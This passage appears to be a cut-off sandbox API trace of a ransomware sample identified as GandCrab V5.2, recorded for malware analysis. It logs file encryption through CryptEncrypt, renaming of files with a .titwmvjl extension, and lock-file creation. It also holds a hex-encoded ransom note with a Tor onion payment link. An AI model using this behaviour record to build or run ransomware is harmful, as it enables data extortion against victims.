pdwDataLen=0x259f658*=0x100) returned 1 [0068.272] GetLastError () returned 0x0 [0068.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.272] CryptDestroyKey (hKey=0x4ca0b8) returned 1 [0068.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.272] CryptReleaseContext (hProv=0x4c9aa8, dwFlags=0x0) returned 1 [0068.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.273] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9aa8) returned 1 [0068.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.273] CryptImportKey (in: hProv=0x4c9aa8, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x4ca0b8) returned 1 [0068.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.273] CryptGetKeyParam (in: hKey=0x4ca0b8, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0068.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.274] CryptEncrypt (in: hKey=0x4ca0b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2610100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2610100*, pdwDataLen=0x259f658*=0x100) returned 1 [0068.274] GetLastError () returned 0x0 [0068.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.274] CryptDestroyKey (hKey=0x4ca0b8) returned 1 [0068.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.274] CryptReleaseContext (hProv=0x4c9aa8, dwFlags=0x0) returned 1 [0068.274] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0068.275] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2740000 [0068.275] ReadFile (in: hFile=0x230, lpBuffer=0x2630000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f704*=0x100000, lpOverlapped=0x0) returned 1 [0068.504] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.504] WriteFile (in: hFile=0x230, lpBuffer=0x2740000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2740000*, lpNumberOfBytesWritten=0x259f6e8*=0x100000, lpOverlapped=0x0) returned 1 [0068.574] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.574] WriteFile (in: hFile=0x230, lpBuffer=0x2610000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2610000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0068.578] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.583] VirtualFree (lpAddress=0x2740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.589] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.589] CloseHandle (hObject=0x230) returned 1 [0069.067] MoveFileExW (lpExistingFileName="C:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "c:\\recovery\\windowsre\\winre.wim"), lpNewFileName="C:\\Recovery\\WindowsRE\\Winre.wim.titwmvjl" (normalized: "c:\\recovery\\windowsre\\winre.wim.titwmvjl"), dwFlags=0x1) returned 1 [0069.068] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.068] FindNextFileW (in: hFindFile=0x4ca078, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 0 [0069.068] FindClose (in: hFindFile=0x4ca078 | out: hFindFile=0x4ca078) returned 1 [0069.068] CloseHandle (hObject=0x228) returned 1 [0069.069] FindNextFileW (in: hFindFile=0x4c9e78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0 [0069.069] FindClose (in: hFindFile=0x4c9e78 | out: hFindFile=0x4c9e78) returned 1 [0069.069] CloseHandle (hObject=0x220) returned 1 [0069.070] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0069.070] lstrcmpW (lpString1="swapfile.sys", lpString2=".") returned 1 [0069.070] lstrcmpW (lpString1="swapfile.sys", lpString2="..") returned 1 [0069.070] lstrcatW (in: lpString1="C:\\", lpString2="swapfile.sys" | out: lpString1="C:\\swapfile.sys") returned="C:\\swapfile.sys" [0069.070] lstrlenW (lpString=".titwmvjl") returned 9 [0069.070] lstrlenW (lpString="C:\\swapfile.sys") returned 15 [0069.070] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.070] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\swapfile.sys.titwmvjl") returned 24 [0069.070] lstrlenW (lpString="C:\\swapfile.sys") returned 15 [0069.070] lstrlenW (lpString=".sys") returned 4 [0069.070] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.070] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".sys ") returned 5 [0069.070] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.070] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.071] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0069.071] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0069.071] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0069.071] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0069.071] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0069.071] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.072] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.072] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.072] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.072] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.072] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\System Volume Information\\\\TITWMVJL-DECRYPT.txt") returned 50 [0069.072] CreateFileW (lpFileName="C:\\System Volume Information\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\system volume information\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0069.072] GetLastError () returned 0x5 [0069.073] GetLastError () returned 0x5 [0069.073] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.073] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.073] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x184)) [0069.073] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.073] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.073] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.073] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\System Volume Information\\d2ca4a09d2ca4deb61a.lock") returned 53 [0069.074] CreateFileW (lpFileName="C:\\System Volume Information\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\system volume information\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0xffffffff [0069.074] GetLastError () returned 0x5 [0069.074] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.074] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.074] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0069.074] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*" | out: lpString1="C:\\System Volume Information\\*") returned="C:\\System Volume Information\\*" [0069.074] FindFirstFileExW (in: lpFileName="C:\\System Volume Information\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0xffffffff [0069.074] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*", lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0xffffffff [0069.074] CloseHandle (hObject=0xffffffff) returned 1 [0069.075] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0069.075] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.075] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.075] lstrcatW (in: lpString1="C:\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\TITWMVJL-DECRYPT.txt") returned="C:\\TITWMVJL-DECRYPT.txt" [0069.075] lstrlenW (lpString=".titwmvjl") returned 9 [0069.075] lstrlenW (lpString="C:\\TITWMVJL-DECRYPT.txt") returned 23 [0069.075] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.075] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 32 [0069.075] lstrlenW (lpString="C:\\TITWMVJL-DECRYPT.txt") returned 23 [0069.075] lstrlenW (lpString=".txt") returned 4 [0069.075] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.075] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.075] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.075] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.075] lstrlenW (lpString="C:\\TITWMVJL-DECRYPT.txt") returned 23 [0069.075] lstrlenW (lpString="C:\\TITWMVJL-DECRYPT.txt") returned 23 [0069.075] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.075] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.075] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.075] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.076] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.076] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.076] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.076] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.076] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.076] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0069.076] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0069.076] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0069.076] lstrcatW (in: lpString1="C:\\", lpString2="Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0069.076] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0069.076] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.076] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.077] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.077] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.077] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\\\TITWMVJL-DECRYPT.txt") returned 30 [0069.078] CreateFileW (lpFileName="C:\\Users\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0069.078] GetLastError () returned 0x50 [0069.078] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.078] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.078] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x18e)) [0069.078] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.078] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.078] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.079] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\d2ca4a09d2ca4deb61a.lock") returned 33 [0069.079] CreateFileW (lpFileName="C:\\Users\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x220 [0069.079] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.079] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.079] lstrlenW (lpString="C:\\Users\\") returned 9 [0069.079] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*" | out: lpString1="C:\\Users\\*") returned="C:\\Users\\*" [0069.079] FindFirstFileExW (in: lpFileName="C:\\Users\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0x5035f8 [0069.079] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.080] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0069.080] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.080] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.080] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0069.080] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0069.080] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0069.080] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0069.080] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0069.080] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.080] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.081] FindNextFileW (in: hFindFile=0x5035f8, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0069.081] lstrcmpW (lpString1="CIiHmnxMn6Ps", lpString2=".") returned 1 [0069.081] lstrcmpW (lpString1="CIiHmnxMn6Ps", lpString2="..") returned 1 [0069.081] lstrcatW (in: lpString1="C:\\Users\\", lpString2="CIiHmnxMn6Ps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps") returned="C:\\Users\\CIiHmnxMn6Ps" [0069.081] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\") returned="C:\\Users\\CIiHmnxMn6Ps\\" [0069.081] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.081] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.081] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.082] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.082] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.082] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.082] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.082] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\\\TITWMVJL-DECRYPT.txt") returned 43 [0069.082] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0069.082] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x